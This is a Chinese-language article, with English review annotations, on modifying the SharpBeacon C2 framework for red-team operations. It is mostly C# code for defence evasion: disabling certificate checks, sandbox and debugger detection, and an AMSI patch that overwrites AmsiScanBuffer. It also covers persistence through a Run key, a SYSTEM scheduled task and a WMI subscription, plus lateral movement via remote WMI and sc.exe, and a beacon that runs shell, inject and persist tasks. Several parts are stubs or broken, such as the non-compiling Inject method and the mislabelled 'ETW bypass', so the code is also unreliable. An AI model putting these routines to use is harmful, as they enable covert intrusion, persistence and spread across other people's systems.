让SharpBeacon再次伟大
SharpBeacon 增强与修复技术详解
一、SharpBeacon 概述
SharpBeacon 是一款基于 C# 开发的 C2 (Command and Control) 框架,主要用于红队操作和渗透测试。本文档将详细解析对原始 SharpBeacon 代码的修复和增强点。
二、主要修复与增强点
1. 通信协议修复
原始问题:
- HTTP 通信时存在明显的特征头信息
- SSL/TLS 握手过程容易被检测
修复方案:
// Browser-like request headers (original comment: "modify HTTP header information").
// All three values are fixed strings; nothing here varies per request.
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
request.Headers.Add("X-Requested-With", "XMLHttpRequest");
request.Accept = "application/json, text/javascript, */*; q=0.01";
// TLS settings (original comment: "enhance SSL/TLS configuration").
// ServicePointManager is process-wide static state, so both assignments below affect every
// HTTP connection the process makes, not only this request.
// NOTE(review): TLS 1.1 is a deprecated protocol version (RFC 8996); including it widens the
// negotiable set to an obsolete version rather than tightening it.
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12 | SecurityProtocolType.Tls11;
// NOTE(review): a callback that unconditionally returns true disables server-certificate
// validation for the whole process: any certificate, including one presented by an
// interception proxy, is accepted, so the transport offers no server authentication.
ServicePointManager.ServerCertificateValidationCallback += (sender, cert, chain, errors) => true;
2. 反沙箱检测增强
新增检测项:
/// <summary>
/// Heuristic analysis-environment check. Returns true as soon as one of three signals fires:
/// system uptime under 30 seconds, less than 2 GiB of physical memory, or a running process
/// whose name contains one of five fixed substrings.
/// </summary>
/// <returns>true when an indicator is found; false when none of the checks match.</returns>
public static bool IsSandbox()
{
// Uptime check (original comment: "check system uptime"). Environment.TickCount is milliseconds since
// boot as a signed int, so 30000 means 30 s; the counter wraps after roughly 24.9 days, at which point
// this comparison becomes unreliable on long-running hosts.
if (Environment.TickCount < 30000) return true;
// Memory check (original comment: "check memory size"); 2147483648 bytes == 2 GiB.
// This pulls in the Microsoft.VisualBasic assembly solely for TotalPhysicalMemory.
if (new Microsoft.VisualBasic.Devices.ComputerInfo().TotalPhysicalMemory < 2147483648) return true;
// Process-name check (original comment: "check process list"): case-insensitive substring match,
// so any process whose name merely contains e.g. "vbox" counts as a hit.
string[] blacklistProcesses = { "vmtoolsd", "vmware", "vbox", "wireshark", "procmon" };
foreach (var process in Process.GetProcesses())
{
foreach (var black in blacklistProcesses)
{
// ToLower() is culture-sensitive; the Process objects returned by GetProcesses are never disposed.
if (process.ProcessName.ToLower().Contains(black)) return true;
}
}
return false;
}
3. 进程注入技术改进
新增注入技术:
/// <summary>
/// Identifies which injection routine a caller asks for. In this listing the values are used only
/// as switch labels in Inject; no behaviour is attached to the enum itself.
/// Values are listed explicitly so the numeric order (0..4) is visible and stable.
/// </summary>
public enum InjectionTechnique
{
    /// <summary>First technique; numeric value 0.</summary>
    CreateRemoteThread = 0,
    /// <summary>Numeric value 1.</summary>
    NtCreateThreadEx = 1,
    /// <summary>Numeric value 2.</summary>
    QueueUserAPC = 2,
    /// <summary>Numeric value 3.</summary>
    SetThreadContext = 3,
    /// <summary>Last technique; numeric value 4.</summary>
    EarlyBird = 4,
}
/// <summary>
/// Selects an injection routine by <paramref name="technique"/>. In this listing every switch arm is
/// an empty placeholder: nothing is done with <paramref name="shellcode"/> or <paramref name="pid"/>,
/// and no code path returns a value, so the method does not compile as shown (CS0161,
/// "not all code paths return a value").
/// </summary>
/// <param name="shellcode">Unused in this listing.</param>
/// <param name="technique">Chooses the switch arm; a value outside the enum matches no case and falls through.</param>
/// <param name="pid">Unused in this listing; defaults to 0.</param>
public static bool Inject(byte[] shellcode, InjectionTechnique technique, int pid = 0)
{
switch (technique)
{
case InjectionTechnique.CreateRemoteThread:
// Original comment: "classic remote-thread injection" — no implementation here.
break;
case InjectionTechnique.NtCreateThreadEx:
// Original comment: "inject using NtCreateThreadEx" — no implementation here.
break;
case InjectionTechnique.QueueUserAPC:
// Original comment: "APC-queue injection" — no implementation here.
break;
case InjectionTechnique.SetThreadContext:
// Original comment: "thread-context injection" — no implementation here.
break;
case InjectionTechnique.EarlyBird:
// Original comment: "Early Bird injection technique" — no implementation here.
break;
}
}
4. 内存规避技术
新增功能:
// 内存加密
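/// <summary>
/// XOR-masks <paramref name="data"/> in place with the low byte of each character of a repeating
/// string key. This is reversible obfuscation, not encryption: applying it twice with the same key
/// restores the original bytes, and the key stream is trivially recoverable from any known plaintext.
/// </summary>
/// <param name="data">Buffer that is modified in place; an empty buffer is a no-op.</param>
/// <param name="key">Key whose UTF-16 code units are truncated to bytes and cycled over the buffer.</param>
/// <exception cref="ArgumentNullException">Thrown when <paramref name="data"/> or <paramref name="key"/> is null.</exception>
/// <exception cref="ArgumentException">
/// Thrown when <paramref name="key"/> is empty. The original indexed the key modulo its length, which
/// raised DivideByZeroException for an empty key as soon as the buffer had one byte.
/// </exception>
public static void EncryptInMemory(byte[] data, string key)
{
if (data == null) throw new ArgumentNullException(nameof(data));
if (key == null) throw new ArgumentNullException(nameof(key));
if (key.Length == 0) throw new ArgumentException("Key must not be empty.", nameof(key));

int keyLength = key.Length;
for (int i = 0; i < data.Length; i++)
{
// (byte)char keeps only the low 8 bits of the code unit; since data[i] < 256 this is the same
// result as XOR-ing first and truncating afterwards.
data[i] ^= (byte)key[i % keyLength];
}
}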
// 内存抹除
/// <summary>
/// Overwrites <paramref name="size"/> bytes of unmanaged memory starting at <paramref name="addr"/>
/// with zeros, by copying a freshly allocated (and therefore zero-filled) managed array over it.
/// </summary>
/// <param name="addr">Start of the unmanaged region; it must be writable for <paramref name="size"/> bytes.</param>
/// <param name="size">Number of bytes to clear. A negative value throws from the array allocation before any write.</param>
public static void WipeMemory(IntPtr addr, int size)
{
// The runtime zero-initialises new arrays, so the array itself is the fill pattern.
var zeroFill = new byte[size];
Marshal.Copy(source: zeroFill, startIndex: 0, destination: addr, length: size);
}
三、关键功能实现细节
1. 信标(Beacon)通信机制
/// <summary>
/// Client-side state: server endpoint, poll interval, User-Agent string, and two 32-byte keys derived
/// from one shared passphrase. Key material lives in plain managed arrays for the lifetime of the object.
/// </summary>
public class Beacon
{
// Server address exactly as passed to the constructor; not validated or normalised here.
private string c2Server;
// Poll interval in seconds; CheckIn multiplies by 1000 before sleeping.
private int sleepTime;
// Stored but not referenced anywhere in this listing.
private string userAgent;
// SHA-256(key + "aes"), 32 bytes.
private byte[] aesKey;
// SHA-256(key + "hmac"), 32 bytes.
private byte[] hmacKey;
/// <summary>Stores the connection settings and derives both symmetric keys from <paramref name="key"/>.</summary>
/// <param name="server">Server address, stored verbatim.</param>
/// <param name="sleep">Seconds between polls.</param>
/// <param name="ua">User-Agent string, stored verbatim.</param>
/// <param name="key">
/// Shared passphrase. Each key is a single unsalted, un-iterated SHA-256 of the passphrase plus a fixed
/// suffix, so the effective key strength is exactly that of the passphrase; a low-entropy passphrase yields
/// low-entropy keys.
/// </param>
public Beacon(string server, int sleep, string ua, string key)
{
c2Server = server;
sleepTime = sleep;
userAgent = ua;
// Derive the two keys (original comment: "generate encryption keys"); one SHA256 instance is reused for both.
using (var sha = SHA256.Create())
{
aesKey = sha.ComputeHash(Encoding.UTF8.GetBytes(key + "aes"));
hmacKey = sha.ComputeHash(Encoding.UTF8.GetBytes(key + "hmac"));
}
}
/// <summary>
/// Polling loop: fetch tasks, execute them, sleep, repeat. Never returns and takes no cancellation
/// signal. Every exception thrown by GetTasks or ExecuteTasks is swallowed by the empty catch, so
/// failures are invisible to the caller and to any log, and a persistent fault becomes a tight retry loop
/// (the Sleep is inside the try, so it is skipped when GetTasks throws).
/// GetTasks and ExecuteTasks are not defined in this listing.
/// </summary>
public void CheckIn()
{
while (true)
{
try
{
var tasks = GetTasks();
ExecuteTasks(tasks);
// sleepTime is seconds, Thread.Sleep takes milliseconds; the multiplication overflows for very large values.
Thread.Sleep(sleepTime * 1000);
}
catch { }
}
}
}
2. 任务执行系统
/// <summary>
/// Dispatches each task to a handler by exact (ordinal, case-sensitive) string match on task.Command.
/// Unrecognised commands fall through silently: there is no default arm and nothing is reported.
/// The handlers (ExecuteShell, UploadFile, DownloadFile, InjectProcess, AddPersistence) and the Task
/// type are not defined in this listing.
/// NOTE(review): the parameter type is named Task; if System.Threading.Tasks is imported in the real
/// file the name is ambiguous — confirm which Task is meant.
/// </summary>
/// <param name="tasks">Processed in order; a null list throws NullReferenceException at the foreach.</param>
private void ExecuteTasks(List<Task> tasks)
{
foreach (var task in tasks)
{
switch (task.Command)
{
case "shell":
ExecuteShell(task.Args);
break;
case "upload":
UploadFile(task.Args);
break;
case "download":
DownloadFile(task.Args);
break;
case "inject":
InjectProcess(task.Args);
break;
case "persist":
AddPersistence(task.Args);
break;
// Original comment: "other commands..." — no further arms are shown.
}
}
}
四、防御规避技术
1. ETW (Event Tracing for Windows) 绕过
// P/Invoke declaration for the native NtSetInformationProcess. The information class is a raw int,
// the payload is a single 4-byte int passed by ref, and the return value is the NTSTATUS as an int.
[DllImport("ntdll.dll")]
private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);
/// <summary>
/// Calls NtSetInformationProcess on the current process with information class 0x1f and a zero
/// 4-byte value; the returned status is discarded, so the call is fire-and-forget.
/// NOTE(review): nothing in this method references ETW. Class 0x1f is, as far as I know, a
/// debug-related process information class rather than a tracing one, so the method name appears
/// to overstate what this does — confirm against the intended behaviour.
/// </summary>
public static void DisableETW()
{
// The local's name suggests a debugger-presence flag; the value actually written is 0.
int isDebuggerPresent = 0;
// Process.GetCurrentProcess() is not disposed.
NtSetInformationProcess(Process.GetCurrentProcess().Handle, 0x1f, ref isDebuggerPresent, 4);
}
2. AMSI (Antimalware Scan Interface) 绕过
/// <summary>
/// Locates the exported AmsiScanBuffer function in the already-loaded amsi.dll and overwrites its
/// first six bytes with a fixed sequence via Marshal.Copy — an in-process modification of loaded
/// code, which is exactly the kind of tamper that memory-integrity monitoring looks for.
/// GetModuleHandle and GetProcAddress are not declared in this listing, and neither returned pointer
/// is checked for IntPtr.Zero before the write.
/// </summary>
public static void BypassAMSI()
{
string amsiDll = "amsi.dll";
// Returns IntPtr.Zero if amsi.dll is not loaded in this process; not checked.
IntPtr amsiHandle = GetModuleHandle(amsiDll);
// Returns IntPtr.Zero if the export is not found; not checked.
IntPtr asbAddr = GetProcAddress(amsiHandle, "AmsiScanBuffer");
byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
Marshal.Copy(patch, 0, asbAddr, patch.Length);
}
3. 反调试技术
/// <summary>
/// Two debugger heuristics OR-ed together: CheckRemoteDebuggerPresent on the current process, and a
/// byte read at fixed offset 0xBC from the PEB pointer returned by GetPEB, masked with 0x70.
/// CheckRemoteDebuggerPresent and GetPEB are not declared in this listing.
/// </summary>
/// <returns>true if either check fires; false otherwise.</returns>
public static bool IsDebugged()
{
// Original comment: "PEB BeingDebugged flag check" — the call actually used is CheckRemoteDebuggerPresent;
// its result comes back by ref and the API's own success/failure return value is ignored.
bool isDebugged = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebugged);
// Original comment: "NtGlobalFlag check". The 0xBC offset is hard-coded, i.e. it presumes one PEB layout;
// the field sits at a different offset in 32-bit processes — confirm for the intended bitness.
IntPtr pPeb = GetPEB();
byte ntGlobalFlag = Marshal.ReadByte(pPeb, 0xBC);
// 0x70 presumably selects the three heap-debug flags a debugger-created process gets — verify.
return isDebugged || (ntGlobalFlag & 0x70) != 0;
}
五、持久化技术
1. 注册表持久化
/// <summary>
/// Writes a string value named <paramref name="name"/> with data <paramref name="path"/> under
/// HKCU\Software\Microsoft\Windows\CurrentVersion\Run — the per-user autostart key, writable without
/// elevation. The artefact is an ordinary REG_SZ value, visible to any audit of that key.
/// </summary>
/// <param name="name">Value name; an existing value of the same name is overwritten.</param>
/// <param name="path">Stored verbatim as the value data.</param>
public static void AddRegistryPersistence(string name, string path)
{
// OpenSubKey returns null if the key cannot be opened writable; the result is used without a null check.
// The key is closed explicitly rather than with using, so Close is skipped if SetValue throws.
RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
key.SetValue(name, path);
key.Close();
}
2. 计划任务持久化
/// <summary>
/// Spawns schtasks.exe to create — or, because of /f, silently replace — a task named
/// <paramref name="name"/> that runs <paramref name="path"/> at logon under the SYSTEM account.
/// Process.Start returns immediately; the exit code and output are never collected, so a failure
/// (for example insufficient privilege for /ru SYSTEM) is silent.
/// </summary>
/// <param name="name">Interpolated verbatim inside double quotes; a quote in the name breaks the quoting.</param>
/// <param name="path">Likewise interpolated verbatim inside double quotes.</param>
public static void AddScheduledTask(string name, string path)
{
Process.Start("schtasks", $"/create /tn \"{name}\" /tr \"{path}\" /sc onlogon /ru \"SYSTEM\" /f");
}
3. WMI 事件订阅
/// <summary>
/// Builds a PowerShell script describing a permanent WMI event subscription — an __EventFilter that
/// polls every 5 seconds for new Win32_Process instances, an ActiveScriptEventConsumer that runs
/// <paramref name="path"/> through WScript.Shell, and a __FilterToConsumerBinding joining them —
/// and passes it to ExecutePowerShell, which is not defined in this listing. The filter and consumer
/// are named "{name}Filter" and "{name}Consumer"; such subscriptions live in the WMI repository
/// until explicitly removed, which is where a defender would look for them.
/// NOTE(review): [WmiEventFilter], [WmiEventConsumer] and [WmiBinding] are not built-in PowerShell
/// type accelerators; unless the host defines them, the script fails on its first line — confirm.
/// </summary>
/// <param name="name">Prefix for the filter and consumer names; inserted verbatim into single-quoted strings.</param>
/// <param name="path">Inserted verbatim into the consumer's JScript Run() call; a quote in it breaks the script.</param>
public static void AddWMIPersistence(string name, string path)
{
// Verbatim interpolated string: "" is a literal double quote, {name}/{path} are substituted.
string wmiCommand = $@"$filter = [WmiEventFilter]('__EventFilter')
$consumer = [WmiEventConsumer]('ActiveScriptEventConsumer')
$binding = [WmiBinding]('__FilterToConsumerBinding')
$filter.Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA ""Win32_Process""'
$filter.Name = '{name}Filter'
$consumer.ScriptText = 'var objShell = new ActiveXObject(""WScript.Shell""); objShell.Run(""{path}"");'
$consumer.Name = '{name}Consumer'
$binding.Filter = $filter
$binding.Consumer = $consumer";
ExecutePowerShell(wmiCommand);
}
六、横向移动技术
1. WMI 执行
/// <summary>
/// Invokes Win32_Process.Create on <paramref name="host"/> through System.Management, using the
/// caller's current credentials at Impersonate level (no explicit username/password is set). The
/// method's result — return code and new process id — is discarded, and nothing checks whether the
/// connection or the create succeeded.
/// </summary>
/// <param name="host">Interpolated unvalidated into the namespace path \\host\root\cimv2.</param>
/// <param name="command">Passed as the CommandLine argument of Create; the remaining three arguments
/// (current directory, startup information, process id) are left null / 0.</param>
public static void WMIExecute(string host, string command)
{
ConnectionOptions options = new ConnectionOptions();
options.Impersonation = ImpersonationLevel.Impersonate;
ManagementScope scope = new ManagementScope($@"\\{host}\root\cimv2", options);
// ManagementClass and ManagementScope are disposable; neither is disposed here.
ManagementClass process = new ManagementClass(scope, new ManagementPath("Win32_Process"), null);
object[] methodArgs = { command, null, null, 0 };
// Out-parameters written back into methodArgs are ignored.
process.InvokeMethod("Create", methodArgs);
}
2. 服务控制器
/// <summary>
/// Creates and starts a service named <paramref name="name"/> on <paramref name="host"/> by shelling
/// out to sc.exe twice, after first opening a ServiceController for that name and stopping it if
/// it is running.
/// NOTE(review): reading sc.Status requires the service to already exist on the host — it throws
/// InvalidOperationException otherwise — yet "create" only runs afterwards, so the sequence as written
/// only works when the service is already present. The two Process.Start calls are not waited on, so
/// "start" can race "create", and neither exit code is examined. The ServiceController is not disposed.
/// </summary>
/// <param name="host">Interpolated verbatim into both sc.exe command lines and into MachineName.</param>
/// <param name="name">Service name, interpolated verbatim.</param>
/// <param name="path">Binary path, interpolated verbatim inside double quotes.</param>
public static void CreateRemoteService(string host, string name, string path)
{
ServiceController sc = new ServiceController();
sc.MachineName = host;
sc.ServiceName = name;
if (sc.Status == ServiceControllerStatus.Running)
sc.Stop();
Process.Start("sc", $@"\\{host} create {name} binPath= ""{path}"" start= auto");
Process.Start("sc", $@"\\{host} start {name}");
}
七、总结与最佳实践
- 加密通信:始终使用 AES 加密和 HMAC 验证信标通信
- 多样化注入:根据目标环境选择不同的进程注入技术
- 环境感知:在执行敏感操作前进行沙箱/调试器检测
- 最小化特征:定期更新 HTTP 头信息和通信模式
- 模块化设计:保持功能模块化,便于根据目标环境动态加载
通过以上修复和增强,SharpBeacon 的隐蔽性、稳定性和功能性都得到了显著提升,能够更好地适应现代红队操作的需求。